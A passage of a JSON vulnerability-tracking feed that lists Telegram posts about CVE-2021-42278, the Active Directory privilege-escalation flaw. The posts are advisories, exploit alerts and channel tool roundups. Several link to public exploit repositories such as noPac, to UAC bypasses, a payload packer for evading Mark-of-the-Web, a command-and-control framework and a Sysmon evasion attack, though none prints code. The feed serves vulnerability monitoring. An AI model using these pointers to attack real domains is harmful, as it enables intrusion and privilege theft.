\u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0439\u0442\u0435 \u041f\u041e \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0438 \u0431\u0443\u0434\u044c\u0442\u0435 \u043d\u0430\u0447\u0435\u043a\u0443!\n\n#securitynews", "creation_timestamp": "2021-12-29T10:52:54.000000Z"}, {"uuid": "873c0e90-a8dc-46ef-80b1-5e15d3e24ce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/poxek/314", "content": "#news Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287 \u0438 CVE-2021-42278, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441\u043b\u0443\u0436\u0431\u044b \u0434\u043e\u043c\u0435\u043d\u0430 Active Directory, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n\n@tomhunter", "creation_timestamp": "2021-12-22T18:21:21.000000Z"}, {"uuid": "ab07e2d6-de75-45cc-8615-d5b9ee64fe78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/ggfcvj/3004", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:37:30.000000Z"}, {"uuid": "c00b5cb4-3669-4e34-9aad-26d3fb4410ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/m1swarr1or/29", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\n\u0441\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2021-12-12T14:54:29.000000Z"}, {"uuid": "f5e1e139-633e-4430-af03-0f09b5624f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/arpsyndicate/1198", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 108 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.928080000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T12:00:54.000000Z"}, {"uuid": "878e09ac-fb3f-42b8-9021-4029a7a82a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/anwar1213xx/1565", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:34.000000Z"}, {"uuid": "2eb08000-d3bc-4709-a143-5c7559e6f55c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/vHTtKQxmAT3f8pPJYMyZLW3MJn_6GFVTdkZIulMbNHlsBg", "content": "", "creation_timestamp": "2023-11-22T10:27:55.000000Z"}, {"uuid": "efdd5df0-ac9c-4954-8529-1c1e81b571e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/arpsyndicate/231", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 104 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.926130000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-11-17T07:24:39.000000Z"}, {"uuid": "ade4c922-250f-45f3-85b2-488db5a4e29f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/piratesofyemen1213/236", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:19.000000Z"}, {"uuid": "248065f6-9458-46ed-8fb7-fa0f6f9a3065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanOfficial/301", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads pass file content scanners, but more importantly to avoid having Mark-Of-The-Web flag on their files. There're various motives on why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, \n\nScout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or Out-of-band resource load by adding OAST host like Burp Collaborator to the parameter value, above of all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target, i was thinking about how can i get vulnerable parameter/endpoint , Hence i made a simple feature is that allowed you to add some pieces of information of the target in your OAST host as a variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T10:44:27.000000Z"}, {"uuid": "bd21b051-99ca-4dc0-8a7f-ad85d4d3b995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/arpsyndicate/1557", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 107 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.924660000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-08T12:18:23.000000Z"}, {"uuid": "178d2a71-e014-4649-bbed-dbb85c23ac25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/pGbiHzrv9DzUjPi4Cg4I-69JMs7D-lD3Hjj7tMRZSaPrsg", "content": "", "creation_timestamp": "2021-12-16T15:05:58.000000Z"}, {"uuid": "4eafd9cb-66ad-499a-9858-21f70df3751b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/piratesofyemen/398", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:15.000000Z"}, {"uuid": "82f17cb9-74a7-4935-85b5-375852dc956e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/4OwSIIHM4Phzi6L1Q-57NlPfvr_pP-K8ZqCBqbr0RdiVmEc", "content": "", "creation_timestamp": "2025-04-29T17:00:10.000000Z"}, {"uuid": "bf1efb48-4cd2-4745-9da7-81a0a15863cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/XQnuNd5X8XmOjKF9F0Yu3FlXocPy2dUR7xXCx3NP2hXIbzk", "content": "", "creation_timestamp": "2025-04-26T23:00:05.000000Z"}, {"uuid": "cb67337d-a1c2-4004-a3b1-6f9485f84e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2621", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads pass file content scanners, but more importantly to avoid having Mark-Of-The-Web flag on their files. There're various motives on why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, \n\nScout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or Out-of-band resource load by adding OAST host like Burp Collaborator to the parameter value, above of all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target, i was thinking about how can i get vulnerable parameter/endpoint , Hence i made a simple feature is that allowed you to add some pieces of information of the target in your OAST host as a variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T08:38:32.000000Z"}, {"uuid": "4e25a206-865b-458a-af8d-16ffe5a1e64f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2834", "content": "Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nSysmonEnte\n\nThis is a POC attack on the integrity of Sysmon which emits a minimal amount of observable events even if a SACL is in place.\n\nTo our understanding, this attack is difficult to detect in environments where no security sensors other than Sysmon or the Windows Event Log are in use.\n\nFor more technical information on the attack and possible mitigations, please see our blogpost.\n\nhttps://github.com/codewhitesec/SysmonEnte\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nuosint\n\nFind The Profiles Of A Person On Social Networks\n\nWith this tool, you can see all the information of the target person's social networks which is publicy available. Many people thik that this tool needs to be installed, so i will make a Telegram Bot so that information can be obtained more easily and there no need to install or do any other probles just simple and easy.\n\nhttps://github.com/uosint-project/uosint\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nVulnerable Web App\n\nsqli-postgres-rce-privesc-hacking-playground\n\nThis is free vulnerable app for novice pentesters & developers to experiment with SQL Injection vulnerability and privilege escalation.\n\nRecommended path:\n\u25ab\ufe0f exploit the SQLi vulnerability\n\u25ab\ufe0f get shell via vulnerable version of PostgreSQL\n\u25ab\ufe0f perform privilage escalation and become root \ud83e\udd42\n\nhttps://github.com/filipkarc/sqli-postgres-rce-privesc-hacking-playground\n\n#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-04-03T08:51:04.000000Z"}, {"uuid": "405a3ec6-d617-44a2-b5ea-298833518afd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/_JBB2P7ziQrNJ4Dse1MxmwqNvcRRxo6Hvl1KnPWFL1nmQa0", "content": "", "creation_timestamp": "2022-09-28T14:56:36.000000Z"}, {"uuid": "deded1b3-f8c2-4036-87fb-749e1b89d183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/611", "content": "CVE-2021-45608 | NetUSB RCE\nFlaw in Millions of End User Routers\nhttps://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers\n\nCVE-2021-42278 Domain Escalation - sAMAccountName\u00a0Spoofing\nhttps://pentestlab.blog/2022/01/10/domain-escalation-samaccountname-spoofing\n\nNew macOS vulnerability, \u201cpowerdir,\u201d could lead to unauthorized user data access\nhttps://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access", "creation_timestamp": "2022-01-11T18:24:07.000000Z"}, {"uuid": "454b2b73-3aa6-4ad3-b8c6-0fa86b501127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/550", "content": "Python implementation for #CVE-2021-42278 Active Directory Privilege Escalation\nhttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-14T12:42:10.000000Z"}, {"uuid": "b76998e8-e9c9-4fde-9d58-bd51d1382f80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/542", "content": "#CVE-2021-42287 / #CVE-2021-42278 Scanner & Exploiter\nhttps://github.com/cube0x0/noPac\n\nimpersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-12T16:04:05.000000Z"}, {"uuid": "69c23287-bc2a-4a60-a362-20fc935a6d73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/ef4wbo4l4Rv2QiVrhNHWzlDYXi82eYKt40N4lamanJL8Uw", "content": "", "creation_timestamp": "2021-12-12T21:48:33.000000Z"}, {"uuid": "330ef22c-2eee-4fb1-8182-52dc415aab92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/Tim_Mafia_Hackers_lslami/1691", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: 